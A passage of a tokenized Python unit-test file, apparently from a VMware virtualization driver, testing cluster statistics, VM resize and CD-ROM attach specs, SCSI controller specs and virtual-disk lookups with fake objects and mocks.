string|'"HostSystem"'
op|')'
op|']'
newline|'\n'
name|'hosts'
op|'='
name|'fake'
op|'.'
name|'_convert_to_array_of_mor'
op|'('
name|'ManagedObjectRefs'
op|')'
newline|'\n'
name|'respool'
op|'='
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"resgroup-11"'
op|','
string|'"ResourcePool"'
op|')'
newline|'\n'
name|'prop_dict'
op|'='
op|'{'
string|"'host'"
op|':'
name|'hosts'
op|','
string|"'resourcePool'"
op|':'
name|'respool'
op|'}'
newline|'\n'
nl|'\n'
name|'hardware'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'hardware'
op|'.'
name|'numCpuCores'
op|'='
number|'8'
newline|'\n'
name|'hardware'
op|'.'
name|'numCpuThreads'
op|'='
number|'16'
newline|'\n'
name|'hardware'
op|'.'
name|'vendor'
op|'='
string|'"Intel"'
newline|'\n'
name|'hardware'
op|'.'
name|'cpuModel'
op|'='
string|'"Intel(R) Xeon(R)"'
newline|'\n'
nl|'\n'
name|'runtime_host_1'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'runtime_host_1'
op|'.'
name|'connectionState'
op|'='
string|'"connected"'
newline|'\n'
name|'runtime_host_1'
op|'.'
name|'inMaintenanceMode'
op|'='
name|'False'
newline|'\n'
nl|'\n'
name|'runtime_host_2'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'runtime_host_2'
op|'.'
name|'connectionState'
op|'='
name|'connection_state'
newline|'\n'
name|'runtime_host_2'
op|'.'
name|'inMaintenanceMode'
op|'='
name|'maintenance_mode'
newline|'\n'
nl|'\n'
name|'prop_list_host_1'
op|'='
op|'['
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"hardware_summary"'
op|','
name|'val'
op|'='
name|'hardware'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"runtime_summary"'
op|','
nl|'\n'
name|'val'
op|'='
name|'runtime_host_1'
op|')'
op|']'
newline|'\n'
name|'prop_list_host_2'
op|'='
op|'['
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"hardware_summary"'
op|','
name|'val'
op|'='
name|'hardware'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"runtime_summary"'
op|','
nl|'\n'
name|'val'
op|'='
name|'runtime_host_2'
op|')'
op|']'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'ObjectContent'
op|'('
string|'"prop_list_host1"'
op|','
nl|'\n'
name|'prop_list_host_1'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'ObjectContent'
op|'('
string|'"prop_list_host1"'
op|','
nl|'\n'
name|'prop_list_host_2'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'respool_resource_usage'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'respool_resource_usage'
op|'.'
name|'maxUsage'
op|'='
number|'5368709120'
newline|'\n'
name|'respool_resource_usage'
op|'.'
name|'overallUsage'
op|'='
number|'2147483648'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
name|'def'
name|'fake_call_method'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
string|'"get_object_properties_dict"'
name|'in'
name|'args'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'prop_dict'
newline|'\n'
dedent|''
name|'elif'
string|'"get_properties_for_a_collection_of_objects"'
name|'in'
name|'args'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'fake_objects'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'respool_resource_usage'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_stats_from_cluster'
op|'('
name|'session'
op|','
string|'"cluster1"'
op|')'
newline|'\n'
name|'mem_info'
op|'='
op|'{'
op|'}'
newline|'\n'
name|'if'
name|'connection_state'
op|'=='
string|'"connected"'
name|'and'
name|'not'
name|'maintenance_mode'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'32'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'16'
newline|'\n'
dedent|''
name|'mem_info'
op|'['
string|"'total'"
op|']'
op|'='
number|'5120'
newline|'\n'
name|'mem_info'
op|'['
string|"'free'"
op|']'
op|'='
number|'3072'
newline|'\n'
name|'expected_stats'
op|'='
op|'{'
string|"'vcpus'"
op|':'
name|'vcpus'
op|','
string|"'mem'"
op|':'
name|'mem_info'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_stats'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_connected_and_active
dedent|''
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_connected_and_active'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_disconnected_and_active
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_disconnected_and_active'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
name|'connection_state'
op|'='
string|'"disconnected"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_connected_and_maintenance
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_connected_and_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
name|'maintenance_mode'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_host_ref_no_hosts_in_cluster
dedent|''
name|'def'
name|'test_get_host_ref_no_hosts_in_cluster'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NoValidHost'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_host_ref'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
string|'""'
op|')'
op|','
string|"'fake_cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_resize_spec
dedent|''
name|'def'
name|'test_get_resize_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'2'
newline|'\n'
name|'memory_mb'
op|'='
number|'2048'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_resize_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'vcpus'
op|','
name|'memory_mb'
op|','
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'vcpus'
newline|'\n'
name|'cpuAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpuAllocation'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_resize_spec_with_limits
dedent|''
name|'def'
name|'test_get_resize_spec_with_limits'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'2'
newline|'\n'
name|'memory_mb'
op|'='
number|'2048'
newline|'\n'
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_resize_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'vcpus'
op|','
name|'memory_mb'
op|','
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'vcpus'
newline|'\n'
name|'cpuAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpuAllocation'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cdrom_attach_config_spec
dedent|''
name|'def'
name|'test_get_cdrom_attach_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'datastore'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_cdrom_attach_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'datastore'
op|','
nl|'\n'
string|'"/tmp/foo.iso"'
op|','
nl|'\n'
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualCdrom'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'controllerKey'
op|'='
number|'200'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'unitNumber'
op|'='
number|'0'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'1'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'False'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
nl|'\n'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualCdromIsoBackingInfo'"
op|')'
newline|'\n'
name|'backing'
op|'.'
name|'fileName'
op|'='
string|"'/tmp/foo.iso'"
newline|'\n'
name|'backing'
op|'.'
name|'datastore'
op|'='
name|'datastore'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'backing'
op|'='
name|'backing'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_lsilogic_controller_spec
dedent|''
name|'def'
name|'test_lsilogic_controller_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec returned for lsiLogic sas adapter type'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ns0:VirtualLsiLogicSASController"'
op|','
nl|'\n'
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_paravirtual_controller_spec
dedent|''
name|'def'
name|'test_paravirtual_controller_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec returned for paraVirtual adapter type'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_PARAVIRTUAL'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ns0:ParaVirtualSCSIController"'
op|','
nl|'\n'
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_controller_spec_with_specfic_bus_number
dedent|''
name|'def'
name|'test_create_controller_spec_with_specfic_bus_number'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec with specifc bus number rather default 0'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'bus_number'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'busNumber'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_vmdk_path_and_adapter_type_devices
dedent|''
name|'def'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'self'
op|','
name|'filename'
op|','
name|'parent'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
comment|'# Test the adapter_type returned for a lsiLogic sas controller'
nl|'\n'
indent|' '
name|'controller_key'
op|'='
number|'1000'
newline|'\n'
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
name|'filename'
newline|'\n'
name|'disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1024'
newline|'\n'
name|'if'
name|'parent'
op|':'
newline|'\n'
indent|' '
name|'disk_backing'
op|'.'
name|'parent'
op|'='
name|'parent'
newline|'\n'
dedent|''
name|'disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
comment|'# Ephemeral disk'
nl|'\n'
name|'e_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'e_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|"'[test_datastore] uuid/ephemeral_0.vmdk'"
newline|'\n'
name|'e_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'512'
newline|'\n'
name|'e_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
name|'controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicSASController'
op|'('
op|')'
newline|'\n'
name|'controller'
op|'.'
name|'key'
op|'='
name|'controller_key'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk'
op|','
name|'e_disk'
op|','
name|'controller'
op|']'
newline|'\n'
name|'return'
name|'devices'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[test_datastore] uuid/ephemeral_0.vmdk'"
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'512'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'devices'
op|'['
number|'1'
op|']'
op|','
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type_with_match
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type_with_match'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'n_filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'n_filename'
op|')'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|','
name|'uuid'
op|'='
string|"'uuid'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'n_filename'
op|','
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1024'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'devices'
op|'['
number|'0'
op|']'
op|','
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type_with_nomatch
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type_with_nomatch'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'n_filename'
op|'='
string|"'[test_datastore] diuu/diuu.vmdk'"
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'n_filename'
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|','
name|'uuid'
op|'='
string|"'uuid'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_adapter_type
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test for the adapter_type to be used in vmdk descriptor'
nl|'\n'
comment|'# Adapter type in vmdk descriptor is same for LSI-SAS, LSILogic'
nl|'\n'
comment|'# and ParaVirtual'
nl|'\n'
indent|' '
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'ADAPTER_TYPE_PARAVIRTUAL'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
string|'"dummyAdapter"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"dummyAdapter"'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_scsi_adapter_type
dedent|''
name|'def'
name|'test_get_scsi_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
op|'.'
name|'VirtualDevice'
newline|'\n'
name|'scsi_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
op|')'
newline|'\n'
name|'ide_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'scsi_controller'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'ide_controller'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'_update_object'
op|'('
string|'"VirtualMachine"'
op|','
name|'vm'
op|')'
newline|'\n'
comment|'# return the scsi type, not ide'
nl|'\n'
name|'hardware_device'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_scsi_adapter_type'
op|'('
name|'hardware_device'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_scsi_adapter_type_with_error
dedent|''
name|'def'
name|'test_get_scsi_adapter_type_with_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
op|'.'
name|'VirtualDevice'
newline|'\n'
name|'scsi_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
op|')'
newline|'\n'
name|'ide_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'scsi_controller'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'ide_controller'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'_update_object'
op|'('
string|'"VirtualMachine"'
op|','
name|'vm'
op|')'
newline|'\n'
comment|'# the controller is not suitable since the device under this controller'
nl|'\n'
comment|'# has exceeded SCSI_MAX_CONNECT_NUMBER'
nl|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'0'
op|','
name|'constants'
op|'.'
name|'SCSI_MAX_CONNECT_NUMBER'
op|')'
op|':'
newline|'\n'
indent|' '
name|'scsi_controller'
op|'.'
name|'device'
op|'.'
name|'append'
op|'('
string|"'device'"
op|'+'
name|'str'
op|'('
name|'i'
op|')'
op|')'
newline|'\n'
dedent|''
name|'hardware_device'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'StorageError'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_scsi_adapter_type'
op|','
nl|'\n'
name|'hardware_device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_find_allocated_slots
dedent|''
name|'def'
name|'test_find_allocated_slots'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk1'
op|'='
name|'fake'
